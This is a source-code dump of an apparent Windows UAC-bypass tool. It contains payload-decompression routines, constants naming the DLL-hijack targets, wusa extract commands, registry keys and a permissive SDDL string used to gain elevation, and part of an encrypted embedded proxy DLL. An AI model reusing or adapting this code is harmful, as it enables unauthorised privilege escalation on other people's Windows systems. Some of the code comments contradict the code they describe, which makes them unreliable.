
    if (canStore && (BufferSize > 0)) {
        *Buffer = 0;
    }

    if (ParamLen != NULL) {
        *ParamLen = length;
    }

    return (length < BufferSize) ? TRUE : FALSE;
}
69 |
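/*
 * GetCommandLineParamA
 *
 * Purpose:
 *
 * ANSI variant of GetCommandLineParamW: copy the ParamIndex-th
 * space-separated (optionally double-quoted) parameter of CmdLine into
 * Buffer.
 *
 * Parameters:
 *   CmdLine    - command line to scan; may be NULL.
 *   ParamIndex - zero-based index of the wanted parameter.
 *   Buffer     - receives the parameter, NUL-terminated whenever Buffer is
 *                non-NULL and BufferSize > 0; NULL to only measure.
 *   BufferSize - capacity of Buffer in characters, terminator included.
 *   ParamLen   - optional; receives the untruncated parameter length.
 *
 * Returns TRUE when the parameter length is below BufferSize, FALSE when it
 * was truncated or CmdLine is NULL.
 *
 * Fix: on a NULL CmdLine the W variant clears Buffer and ParamLen before
 * returning FALSE, but this variant left both untouched, so a caller that
 * only checked Buffer read stale data. Both variants now share the contract.
 */
BOOL GetCommandLineParamA(
    IN LPCSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
    )
{
    ULONG c, plen = 0;
    char divider;    /* was TCHAR: the separators are plain ANSI characters here */

    if (ParamLen != NULL)
        *ParamLen = 0;

    if (CmdLine == NULL) {
        if ((Buffer != NULL) && (BufferSize > 0))
            *Buffer = 0;
        return FALSE;
    }

    for (c = 0; c <= ParamIndex; c++) {
        plen = 0;

        while (*CmdLine == ' ')
            CmdLine++;

        switch (*CmdLine) {
        case 0:
            goto zero_term_exit;    /* fewer than ParamIndex+1 parameters: plen stays 0 */

        case '"':
            CmdLine++;
            divider = '"';
            break;

        default:
            divider = ' ';
            break;
        }

        /* A '"' ends the parameter even when it was not opened with one. */
        while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
            plen++;
            /* plen counts everything; only the first BufferSize-1 characters are stored */
            if ((c == ParamIndex) && (plen < BufferSize) && (Buffer != NULL)) {
                *Buffer = *CmdLine;
                Buffer++;
            }
            CmdLine++;
        }

        if (*CmdLine != 0)
            CmdLine++;    /* skip the closing quote or separating space */
    }

zero_term_exit:

    if ((Buffer != NULL) && (BufferSize > 0))
        *Buffer = 0;

    if (ParamLen != NULL)
        *ParamLen = plen;

    return (plen < BufferSize) ? TRUE : FALSE;
}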
133 |
/*
 * ExtractFilePathA
 *
 * Copy the directory part of FileName - everything up to and including the
 * last backslash, or nothing when there is none - into FilePath and
 * NUL-terminate it. FilePath is not bounds-checked: it must be large enough
 * for the whole of FileName.
 *
 * Returns a pointer to the terminator written into FilePath, or NULL when
 * either argument is NULL.
 */
char *ExtractFilePathA(const char *FileName, char *FilePath)
{
    size_t i;
    size_t dirLen = 0;

    if ((FileName == NULL) || (FilePath == NULL)) {
        return NULL;
    }

    /* Find the position just after the last '\\'. */
    for (i = 0; FileName[i] != '\0'; i++) {
        if (FileName[i] == '\\') {
            dirLen = i + 1;
        }
    }

    for (i = 0; i < dirLen; i++) {
        FilePath[i] = FileName[i];
    }
    FilePath[dirLen] = '\0';

    return FilePath + dirLen;
}
157 |
/*
 * ExtractFilePathW
 *
 * Wide-character twin of ExtractFilePathA: copy the directory part of
 * FileName (through the last backslash, empty if there is none) into
 * FilePath and NUL-terminate it. FilePath must have room for the whole of
 * FileName; no bound is checked.
 *
 * Returns a pointer to the terminator written into FilePath, or NULL when
 * either argument is NULL.
 */
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)
{
    size_t i;
    size_t dirLen = 0;

    if ((FileName == NULL) || (FilePath == NULL)) {
        return NULL;
    }

    /* Find the position just after the last L'\\'. */
    for (i = 0; FileName[i] != L'\0'; i++) {
        if (FileName[i] == L'\\') {
            dirLen = i + 1;
        }
    }

    for (i = 0; i < dirLen; i++) {
        FilePath[i] = FileName[i];
    }
    FilePath[dirLen] = L'\0';

    return FilePath + dirLen;
}
181 |
--------------------------------------------------------------------------------
/BypassUAC/cmdline.h:
--------------------------------------------------------------------------------
#ifndef _CMDLINEH_
#define _CMDLINEH_

/*
 * Copy the ParamIndex-th space-separated (optionally double-quoted)
 * parameter of CmdLine into Buffer (BufferSize characters, NUL-terminated
 * when Buffer is non-NULL and BufferSize > 0). ParamLen is optional and
 * receives the untruncated length. Returns TRUE when the parameter fits.
 */
BOOL GetCommandLineParamW(
    IN LPCWSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPWSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
    );

/* ANSI variant of GetCommandLineParamW. */
BOOL GetCommandLineParamA(
    IN LPCSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
    );

/*
 * Copy the directory part of FileName (up to and including the last '\\')
 * into FilePath and NUL-terminate it. FilePath must have room for the whole
 * of FileName; no bound is checked. Returns a pointer to the terminator
 * written into FilePath, or NULL when either argument is NULL.
 */
char *ExtractFilePathA(const char *FileName, char *FilePath);
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);

/* TCHAR-style aliases following the UNICODE build setting. */
#ifdef UNICODE

#define ExtractFilePath ExtractFilePathW
#define GetCommandLineParam GetCommandLineParamW

#else // ANSI

#define ExtractFilePath ExtractFilePathA
#define GetCommandLineParam GetCommandLineParamA

#endif

#endif /* _CMDLINEH_ */
36 |
--------------------------------------------------------------------------------
/BypassUAC/compress.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2016
4 | *
5 | * TITLE: COMPRESS.C
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * Compression support.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #include "global.h"
20 |
21 | #ifndef _DEBUG
22 | #undef GENERATE_COMPRESSED_PAYLOAD
23 | #else
24 | #ifdef _WIN64
25 | #include "hibiki64.h"
26 | #include "fubuki64.h"
27 | #include "kongou64.h"
28 | #else
29 | #include "hibiki32.h"
30 | #include "fubuki32.h"
31 | #include "kongou32.h"
32 | #endif
33 | #endif
34 |
35 | /*
36 | * EncodeBuffer
37 | *
38 | * Purpose:
39 | *
40 | * Decrypt/Encrypt given buffer.
41 | *
42 | */
/*
 * EncodeBuffer
 *
 * Purpose:
 *
 * XOR-transform Buffer in place with a rolling key; applying the routine a
 * second time restores the original bytes. Does nothing for a NULL buffer
 * or a zero size.
 */
VOID EncodeBuffer(
    PVOID Buffer,
    ULONG BufferSize
    )
{
    ULONG key = 'ftp2';     /* multi-character constant: its value is implementation-defined */
    ULONG remaining;
    PUCHAR cursor = (PUCHAR)Buffer;

    if ((Buffer == NULL) || (BufferSize == 0)) {
        return;
    }

    /* Only the low byte of the key reaches the buffer (UCHAR store); the
       key is rotated left by one bit after every byte. */
    for (remaining = BufferSize; remaining != 0; remaining--, cursor++) {
        *cursor ^= (UCHAR)key;
        key = _rotl(key, 1);
    }
}
65 |
66 |
67 | /*
68 | * CompressBufferLZNT1
69 | *
70 | * Purpose:
71 | *
72 | * Compress given buffer with LZ algorithm.
73 | *
74 | * Use VirtualFree to release returned buffer when it no longer needed.
75 | *
76 | */
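/*
 * CompressBufferLZNT1
 *
 * Purpose:
 *
 * Compress SrcBuffer with LZNT1. The returned buffer starts with a ULONG
 * holding the original size, followed by the compressed bytes.
 *
 * Parameters:
 *   SrcBuffer           - data to compress; NULL -> NULL.
 *   SrcSize             - size of SrcBuffer in bytes; 0 -> NULL.
 *   FinalCompressedSize - receives the total size of the returned buffer,
 *                         header included; NULL -> NULL. Untouched on failure.
 *
 * Returns the buffer (release with VirtualFree) or NULL on failure.
 *
 * Fixes: (1) when RtlCompressBuffer failed, CompBuffer was freed but still
 * returned, handing the caller a dangling pointer; (2) the destination size
 * passed to RtlCompressBuffer was the whole allocation although the output
 * starts sizeof(ULONG) bytes in; (3) the size arithmetic could wrap.
 */
PUCHAR CompressBufferLZNT1(
    _In_ PUCHAR SrcBuffer,
    _In_ ULONG SrcSize,
    _Inout_ PULONG FinalCompressedSize
    )
{
    BOOL cond = FALSE;      /* single-pass do/while, break = early exit */
    NTSTATUS status;
    ULONG CompressedSize = 0;
    ULONG CompressBufferWorkSpaceSize = 0;
    ULONG CompressFragmentWorkSpaceSize = 0;
    ULONG CompBufferSize = 0;
    PVOID WorkSpace = NULL;
    PUCHAR CompBuffer = NULL;

    if ((SrcBuffer == NULL) || (SrcSize == 0) || (FinalCompressedSize == NULL)) {
        return NULL;
    }

    /* header + data + 0x1000 slack must not wrap the 32-bit size */
    if (SrcSize > ~(ULONG)0 - (0x1000 + sizeof(ULONG))) {
        return NULL;
    }

    do {

        status = RtlGetCompressionWorkSpaceSize(
            COMPRESSION_FORMAT_LZNT1,
            &CompressBufferWorkSpaceSize,
            &CompressFragmentWorkSpaceSize
            );

        //accept nothing but STATUS_SUCCESS
        if (status != STATUS_SUCCESS) {
            break;
        }

        WorkSpace = (PVOID)VirtualAlloc(NULL, CompressBufferWorkSpaceSize,
            MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

        if (WorkSpace == NULL) {
            break;
        }

        //original size + safe buffer + sizeof header
        CompBufferSize = SrcSize + 0x1000 + sizeof(ULONG);
        CompBuffer = (PUCHAR)VirtualAlloc(NULL, CompBufferSize,
            MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

        if (CompBuffer == NULL) {
            break;
        }

        /* Output lands after the header, so offer only the space that is
           really left there - not the whole allocation. */
        CompressedSize = 0;
        status = RtlCompressBuffer(
            COMPRESSION_FORMAT_LZNT1,
            SrcBuffer,
            SrcSize,
            &CompBuffer[sizeof(ULONG)],
            CompBufferSize - sizeof(ULONG),
            4096,                       /* chunk size used by the engine */
            &CompressedSize,
            WorkSpace
            );

        if (status != STATUS_SUCCESS) {
            VirtualFree(CompBuffer, 0, MEM_RELEASE);
            CompBuffer = NULL;          /* never return the freed block */
            break;
        }

        *(PULONG)&CompBuffer[0] = SrcSize;  //save original size
        CompressedSize += sizeof(ULONG);    //add header size
        *FinalCompressedSize = CompressedSize;

    } while (cond);

    if (WorkSpace != NULL) {
        VirtualFree(WorkSpace, 0, MEM_RELEASE);
    }

    return CompBuffer;
}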
150 |
151 | /*
152 | * DecompressBufferLZNT1
153 | *
154 | * Purpose:
155 | *
156 | * Decompress buffer compressed with LZ algorithm.
157 | *
158 | * Use VirtualFree to release returned buffer when it no longer needed.
159 | *
160 | */
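/*
 * DecompressBufferLZNT1
 *
 * Purpose:
 *
 * Decompress an LZNT1 stream into a freshly allocated buffer of
 * UncompressedBufferSize bytes.
 *
 * Parameters:
 *   CompBuffer             - compressed bytes (no size header is skipped
 *                            here; the caller passes the stream itself).
 *   CompSize               - length of CompBuffer in bytes.
 *   UncompressedBufferSize - size of the buffer to allocate and fill.
 *   FinalUncompressedSize  - receives the number of bytes produced.
 *
 * Returns the buffer (release with VirtualFree) or NULL on failure; any
 * NULL pointer or zero size argument is rejected up front instead of being
 * passed to RtlDecompressBuffer.
 */
PUCHAR DecompressBufferLZNT1(
    _In_ PUCHAR CompBuffer,
    _In_ ULONG CompSize,
    _In_ ULONG UncompressedBufferSize,
    _Inout_ PULONG FinalUncompressedSize
    )
{
    PUCHAR UncompBuffer = NULL;
    NTSTATUS status;

    if ((CompBuffer == NULL) || (CompSize == 0) ||
        (UncompressedBufferSize == 0) || (FinalUncompressedSize == NULL)) {
        return NULL;
    }

    UncompBuffer = (PUCHAR)VirtualAlloc(NULL, UncompressedBufferSize,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (UncompBuffer == NULL) {
        return NULL;
    }

    status = RtlDecompressBuffer(
        COMPRESSION_FORMAT_LZNT1,
        UncompBuffer,
        UncompressedBufferSize,
        CompBuffer,
        CompSize,
        FinalUncompressedSize
        );

    //accept only success value; UncompBuffer is known non-NULL here
    if (status != STATUS_SUCCESS) {
        VirtualFree(UncompBuffer, 0, MEM_RELEASE);
        UncompBuffer = NULL;
    }

    return UncompBuffer;
}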
196 |
197 | #ifdef GENERATE_COMPRESSED_PAYLOAD
198 |
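/*
* CompressPayloadItem
*
* Purpose:
*
* Compress one embedded image with LZNT1, xor-encode the result and write it
* to FileName. Helper for CompressPayload and, like it, development-only.
*
* The return value of supWriteBufferToFile is ignored, as in the original
* per-image code; a missing output file is noticed when the build is assembled.
*
*/
static VOID CompressPayloadItem(
    _In_ PUCHAR Src,
    _In_ ULONG SrcSize,
    _In_ LPCTSTR FileName
    )
{
    PUCHAR Data;
    ULONG FinalCompressedSize = 0;

    //NULL means workspace/buffer allocation or compression failed, nothing to write
    Data = CompressBufferLZNT1(Src, SrcSize, &FinalCompressedSize);
    if (Data == NULL) {
        return;
    }

    //same xor pass that DecompressPayload applies again to undo it
    EncodeBuffer(Data, FinalCompressedSize);

    supWriteBufferToFile(FileName, Data, FinalCompressedSize);

    VirtualFree(Data, 0, MEM_RELEASE);
}

/*
* CompressPayload
*
* Purpose:
*
* Create compressed and encrypted by xor files. Used only during development.
* NOT for usage with release.
*
* One *.cd file is produced per embedded image; the bitness of the images and
* of the output names follows the bitness of this build.
*
*/
VOID CompressPayload(
    VOID
    )
{
#ifdef _WIN64
    CompressPayloadItem((PUCHAR)Fubuki64, sizeof(Fubuki64), TEXT("fubuki64.cd"));
    CompressPayloadItem((PUCHAR)Hibiki64, sizeof(Hibiki64), TEXT("hibiki64.cd"));
    CompressPayloadItem((PUCHAR)Kongou64, sizeof(Kongou64), TEXT("kongou64.cd"));
#else
    CompressPayloadItem((PUCHAR)Fubuki32, sizeof(Fubuki32), TEXT("fubuki32.cd"));
    CompressPayloadItem((PUCHAR)Hibiki32, sizeof(Hibiki32), TEXT("hibiki32.cd"));
    CompressPayloadItem((PUCHAR)Kongou32, sizeof(Kongou32), TEXT("kongou32.cd"));
#endif
}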
271 |
272 | #endif
273 |
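/*
* DecompressPayload
*
* Purpose:
*
* Decode payload and then decompress it.
*
* Expects the layout produced by CompressPayload: a ULONG holding the original
* size, followed by the LZNT1 stream, the whole buffer xor-encoded by
* EncodeBuffer. The decompressed image is verified with
* supVerifyMappedImageMatchesChecksum before it is handed back.
*
* Returns a VirtualAlloc'ed buffer holding the decompressed image (release it
* with VirtualFree) or NULL on any failure, including an exception while
* reading the input. When DecompressedBufferSize is not NULL it receives the
* decompressed size, or 0 on failure.
*
*/
PVOID DecompressPayload(
    _In_ PVOID CompressedBuffer,
    _In_ ULONG CompressedBufferSize,
    _Inout_ PULONG DecompressedBufferSize
    )
{
    //cond stays FALSE, the do/while is a single-pass block that break can leave
    //(a variable is used instead of a literal to keep MSVC's constant-condition warning quiet)
    BOOL cond = FALSE, bResult = FALSE;
    PUCHAR Data = NULL, UncompressedData = NULL, Ptr;
    ULONG FinalDecompressedSize = 0, CompSize, OrigSize;

    __try {

        do {

            //the size header must be present, otherwise the subtraction below wraps
            if (CompressedBufferSize < sizeof(ULONG))
                break;

            //work on a private writable copy, the caller's buffer is never modified
            Data = VirtualAlloc(NULL, CompressedBufferSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
            if (Data == NULL)
                break;

            supCopyMemory(Data, CompressedBufferSize, CompressedBuffer, CompressedBufferSize);

            //undo the xor pass applied by CompressPayload
            EncodeBuffer(Data, CompressedBufferSize);

            Ptr = Data;
            OrigSize = *(PULONG)&Ptr[0];                 //original (decompressed) size from the header
            Ptr += sizeof(ULONG);                        //skip header
            CompSize = CompressedBufferSize - sizeof(ULONG); //compressed stream size without header

            //OrigSize comes from the payload itself and sizes the output allocation
            UncompressedData = DecompressBufferLZNT1(Ptr, CompSize, OrigSize, &FinalDecompressedSize);
            if (UncompressedData == NULL)
                break;

            //validate uncompressed data
            if (!supVerifyMappedImageMatchesChecksum(UncompressedData, FinalDecompressedSize)) {
                OutputDebugString(TEXT("Invalid file checksum"));
                break;
            }

            bResult = TRUE;

        } while (cond);

    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        //fall through to the common cleanup so Data/UncompressedData are not leaked
        //and the caller's size is still reported as 0
        bResult = FALSE;
    }

    if (Data != NULL) {
        VirtualFree(Data, 0, MEM_RELEASE);
    }

    if (bResult == FALSE) {
        if (UncompressedData != NULL) {
            VirtualFree(UncompressedData, 0, MEM_RELEASE);
            UncompressedData = NULL;
        }
        FinalDecompressedSize = 0;
    }

    if (DecompressedBufferSize) {
        *DecompressedBufferSize = FinalDecompressedSize;
    }

    return UncompressedData;
}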
348 |
--------------------------------------------------------------------------------
/BypassUAC/compress.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2016
4 | *
5 | * TITLE: COMPRESS.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 15 Nov 2015
10 | *
11 | * Prototypes and definitions for compression.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
//
// Function pointer type matching DecompressPayload (same parameters and
// return value, documented below).
//
typedef PVOID (*pfnDecompressPayload)(
    _In_ PVOID CompressedBuffer,
    _In_ ULONG CompressedBufferSize,
    _Inout_ PULONG DecompressedBufferSize
    );

//
// LZNT1-compress SrcSize bytes from SrcBuffer. The output starts with a ULONG
// holding the original size, followed by the compressed stream; on success
// *FinalCompressedSize receives the total length including that header.
// Returns a buffer allocated with VirtualAlloc (release it with VirtualFree)
// or NULL when the workspace or output buffer cannot be allocated.
//
// NOTE(review): in compress.c the RtlCompressBuffer failure path frees the
// output buffer but does not reset the pointer before `return CompBuffer`,
// so callers may receive an already released pointer in that case.
//
PUCHAR CompressBufferLZNT1(
    _In_ PUCHAR SrcBuffer,
    _In_ ULONG SrcSize,
    _Inout_ PULONG FinalCompressedSize
    );

//
// Decompress CompSize bytes of LZNT1 data from CompBuffer into a new
// VirtualAlloc'ed buffer of UncompressedBufferSize bytes; *FinalUncompressedSize
// receives the number of bytes produced. Returns the buffer (release it with
// VirtualFree) or NULL on allocation or decompression failure.
//
PUCHAR DecompressBufferLZNT1(
    _In_ PUCHAR CompBuffer,
    _In_ ULONG CompSize,
    _In_ ULONG UncompressedBufferSize,
    _Inout_ PULONG FinalUncompressedSize
    );

//
// Development-only helper that writes the compressed and xor-encoded payload
// files; its definition is only compiled when GENERATE_COMPRESSED_PAYLOAD is
// defined, the prototype is always visible.
//
VOID CompressPayload(
    VOID
    );

//
// Undo the xor encoding of CompressedBuffer, decompress it using the size
// header written by CompressBufferLZNT1 and verify the image checksum.
// Returns a VirtualAlloc'ed buffer (release it with VirtualFree) or NULL;
// when DecompressedBufferSize is not NULL it receives the decompressed size
// on success and 0 when the routine reports failure.
//
PVOID DecompressPayload(
    _In_ PVOID CompressedBuffer,
    _In_ ULONG CompressedBufferSize,
    _Inout_ PULONG DecompressedBufferSize
    );
49 |
--------------------------------------------------------------------------------
/BypassUAC/consts.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016
4 | *
5 | * TITLE: CONSTS.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * Global consts definition file.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
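//
// Registry paths, file names and command lines used by the individual methods.
// Paths are written with %temp% / %systemroot% / %windir% placeholders and are
// presumably expanded before use (the expansion is not part of this file).
//
#define T_IFEO L"MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"
#define T_AVRFDLL L"Hibiki.dll"
#define T_AVRF_SOURCEDLL L"%temp%\\Hibiki.dll"
#define T_AVRF_CMDLINE L"/c wusa %ws /extract:%%windir%%\\system32"
#define T_WINSATSRC L"%temp%\\winsat.exe"
#define T_WINSAT_CMDLINE L"/c wusa %ws /extract:%%windir%%\\system32\\sysprep"
#define T_WINSAT_TARGET L"%systemroot%\\system32\\sysprep\\winsat.exe"

#define T_IIS_TARGETDIR L"%systemroot%\\system32\\inetsrv"
#define T_IIS_TARGETAPP L"InetMgr.exe"
#define T_IIS_TARGETDLL L"SLC.dll"

//
// Standard elevation methods.
//
#define M1W7_SOURCEDLL L"%temp%\\CRYPTBASE.dll"
#define M1W7_TARGETDIR L"%systemroot%\\system32\\sysprep\\"
#define M1W7_TARGETPROCESS L"%systemroot%\\system32\\sysprep\\sysprep.exe"
#define M1W8_SOURCEDLL L"%temp%\\shcore.dll"
#define M1WALL_SOURCEDLL L"%temp%\\wdscore.dll"
#define M1W7T_SOURCEDLL L"%temp%\\ActionQueue.dll"
#define M1W10_SOURCEDLL L"%temp%\\dbgcore.dll"
#define M1WALL_TARGETDIR L"%systemroot%\\system32\\oobe\\"
#define M1WALL_TARGETPROCESS L"%systemroot%\\system32\\oobe\\setupsqm.exe"
#define IFILEOP_ELEMONIKER L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}"
#define SYSTEMROOTDIR L"%systemroot%\\system32\\"
#define WBEMDIR L"%systemroot%\\system32\\wbem"
#define TEMPDIR L"%temp%\\"

//UAC policy key and an "everyone: generic all" SDDL string
#define T_UACKEY L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"
#define T_SDDL_ALL_FOR_EVERYONE L"D:(A;;GA;;;WD)"

//default fake msu cabinet name
#define T_MSUPACKAGE_NAME L"%temp%\\ellocnak.msu"

#define METHOD_MIGWIZ_SOURCEDLL L"%temp%\\wdscore.dll"
#define METHOD_MIGWIZ_CMDLINE L"/c wusa %ws /extract:%%windir%%\\system32\\migwiz"
#define METHOD_MIGWIZ_TARGETAPP L"%systemroot%\\system32\\migwiz\\migwiz.exe"

#define METHOD_SQLSRV_SOURCEDLL L"%temp%\\ntwdblib.dll"
#define METHOD_SQLSRV_CMDLINE L"/c wusa %ws /extract:%%windir%%\\system32"
#define METHOD_SQLSRV_TARGETAPP L"%systemroot%\\system32\\cliconfg.exe"

//
// User-facing message strings (TEXT() so they follow the UNICODE setting of the build).
//
#define PROGRAMTITLE TEXT("#BypassUAC#")
#define WOW64STRING TEXT("Apparently it seems you are running under WOW64.\n\rThis is not supported, run x64 version of this tool.")
#define WOW64WIN32ONLY TEXT("This method only works with x86-32 Windows or from Wow64")
#define WIN64ONLY TEXT("This method only works with x86-64 Windows")
#define LAZYWOW64UNSUPPORTED TEXT("Use 32 bit version of this tool on 32 bit OS version")
#define OSTOOOLD TEXT("This method requires Windows 7 and above")
#define UACFIX TEXT("This method fixed/unavailable in the current version of Windows, do you still want to continue?")
#define RESULTOK TEXT("Inject success!")
#define RESULTFAIL TEXT("Something went wrong")

//registry location (under the current user's hive, presumably) used to remember the UAC state
#define T_AKAGI_KEY L"Software\\bypassuac"
#define T_AKAGI_PARAM L"uac_is_disabled"

//system module names
#define T_KERNEL32 L"kernel32.dll"
#define T_OLE32 L"ole32.dll"
#define T_SHELL32 L"shell32.dll"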
80 |
--------------------------------------------------------------------------------
/BypassUAC/fubuki32comp.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016
4 | *
5 | * TITLE: FUBUKI32COMP.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 14 Nov 2015
10 | *
11 | * Encrypted and compressed Fubuki32 proxy dll.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | static const unsigned char Fubuki32Comp[3399] = {
22 | 0x32, 0x7E, 0xC9, 0x93, 0x53, 0xF4, 0x99, 0x7E, 0x3C, 0x5C, 0x99, 0x30, 0x67, 0xCE, 0x9D, 0xB8,
23 | 0x70, 0xE8, 0xE1, 0x5C, 0xB8, 0x8E, 0x1C, 0x80, 0x70, 0xD8, 0xED, 0x80, 0x13, 0x46, 0x08, 0x21,
24 | 0x2B, 0x54, 0x29, 0x93, 0x56, 0x42, 0x86, 0x33, 0xDC, 0xC2, 0x99, 0x87, 0x6E, 0x03, 0xBC, 0x82,
25 | 0x74, 0xE9, 0x9D, 0x6E, 0x66, 0xDA, 0x74, 0x51, 0x03, 0xE0, 0xE0, 0xF1, 0x71, 0x69, 0x6B, 0x6B,
26 | 0x53, 0x09, 0xC9, 0xB3, 0x45, 0x2D, 0xF7, 0x5D, 0x09, 0xB8, 0xB9, 0x33, 0x05, 0xAB, 0xBD, 0x48,
27 | 0x01, 0x86, 0xF1, 0xCA, 0x47, 0xE0, 0x3C, 0x7C, 0x3F, 0xB3, 0xE0, 0xEC, 0x6C, 0x86, 0x68, 0x7C,
28 | 0x1C, 0x69, 0xC4, 0x99, 0x02, 0x48, 0x29, 0x33, 0x85, 0xED, 0x98, 0x8A, 0xC0, 0x8E, 0xF2, 0xD0,
29 | 0x35, 0xED, 0xD2, 0xD9, 0xF8, 0x2A, 0xF6, 0x9A, 0x72, 0xEF, 0xAE, 0x85, 0xE9, 0xAC, 0x0C, 0x1E,
30 | 0xEE, 0x7F, 0xAE, 0x78, 0x8B, 0xDD, 0x9B, 0x34, 0x09, 0x27, 0x3F, 0x31, 0x60, 0x5E, 0x77, 0x3B,
31 | 0x73, 0x60, 0x76, 0xE3, 0xBF, 0x8C, 0x1B, 0xE4, 0x6B, 0x8D, 0xC2, 0x96, 0x73, 0x54, 0x65, 0x7A,
32 | 0x5A, 0x65, 0x8A, 0x97, 0x70, 0x4A, 0x9F, 0x63, 0x66, 0x89, 0x99, 0x33, 0x2B, 0xCF, 0x99, 0x3A,
33 | 0xC4, 0xE0, 0x3B, 0x9D, 0x11, 0x8B, 0x08, 0xD8, 0x70, 0xE2, 0xE1, 0xA9, 0x08, 0x07, 0x02, 0x1A,
34 | 0xC6, 0x76, 0x4A, 0x99, 0x67, 0x5D, 0x8C, 0xB3, 0x65, 0xDC, 0x19, 0x32, 0x47, 0x4E, 0x9C, 0x3A,
35 | 0x74, 0xF8, 0x50, 0x23, 0x47, 0x8E, 0x1C, 0x3A, 0x70, 0xE0, 0xC6, 0x81, 0x04, 0x9D, 0x89, 0x18,
36 | 0xB0, 0x68, 0x99, 0x13, 0x24, 0x4C, 0x0F, 0xCB, 0x4A, 0xCD, 0x96, 0xCF, 0x27, 0xCB, 0x9C, 0x2F,
37 | 0xF6, 0xFD, 0xD0, 0xA1, 0xC6, 0x91, 0x1C, 0x37, 0x71, 0xE3, 0xE0, 0xE1, 0x22, 0x06, 0x0C, 0x37,
38 | 0x32, 0x78, 0xA5, 0xBB, 0x2E, 0x4C, 0x99, 0x0F, 0xE6, 0xC5, 0x99, 0x03, 0x67, 0xCE, 0xE3, 0xDA,
39 | 0x75, 0x5A, 0x50, 0xA6, 0xCE, 0x8F, 0x1C, 0x8C, 0xD1, 0x55, 0xCD, 0x9A, 0x03, 0x09, 0x8C, 0x4A,
40 | 0xB0, 0x4F, 0xC7, 0x9F, 0x25, 0x44, 0xB7, 0x47, 0x03, 0xB4, 0x63, 0x47, 0x67, 0xCB, 0x3F, 0xBA,
41 | 0x15, 0x6A, 0x9E, 0x22, 0x7A, 0x02, 0x23, 0x38, 0x51, 0xE0, 0xA0, 0xAF, 0x71, 0x62, 0x6D, 0x6D,
42 | 0x53, 0x64, 0x51, 0x93, 0xF8, 0x45, 0x99, 0x38, 0x66, 0xC8, 0x99, 0x39, 0xA7, 0xCF, 0x93, 0x32,
43 | 0xB4, 0xE8, 0x59, 0xA3, 0xC6, 0xA6, 0x32, 0x4A, 0x03, 0x92, 0x3E, 0xE2, 0xC3, 0x02, 0xCE, 0x29,
44 | 0xF2, 0x56, 0xCB, 0xD5, 0xE2, 0x02, 0x1C, 0x39, 0xA5, 0xC5, 0x01, 0x56, 0x0B, 0xA1, 0x9D, 0x30,
45 | 0xB4, 0xEA, 0xD1, 0xA3, 0x46, 0x8F, 0xC1, 0xF9, 0x6F, 0xF8, 0x85, 0x89, 0xC0, 0x07, 0x8C, 0x1C,
46 | 0x70, 0x2F, 0xCD, 0xEC, 0x25, 0x53, 0xE6, 0x23, 0x19, 0xDC, 0xE6, 0x23, 0x18, 0xDE, 0xF0, 0x2A,
47 | 0xB7, 0xBD, 0x5A, 0xA3, 0xAB, 0x0D, 0xF0, 0x5C, 0x23, 0xB6, 0x97, 0x0C, 0x83, 0x43, 0xF0, 0x2A,
